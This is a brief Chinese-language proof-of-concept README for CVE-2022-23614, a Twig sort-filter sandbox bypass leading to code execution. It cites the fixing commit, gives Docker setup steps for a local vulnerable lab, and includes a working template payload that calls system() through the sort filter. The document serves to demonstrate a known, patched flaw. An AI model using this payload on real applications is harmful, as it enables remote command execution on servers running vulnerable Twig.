关于 CVE-2022-23614 和 GHSA-5mv2-rx3q-4w2v 的 PoC(Twig sort filter 代码执行/沙盒绕过)
如该提交所示 - https://github.com/twigphp/Twig/commit/22b9dc3c03ee66d7e21d9ed2ca76052b134cb9e9,Twig 将用户提供的函数名作为回调参数传递给 uasort(此处),从而导致任意代码执行。
构建并运行包含易受攻击 Twig 版本的 Docker 容器:
$ ./build-docker.sh
打开 localhost:1337 上的网页,尝试渲染以下 payload:
{{ ['id','']|sort('system') }}
PoC

结果
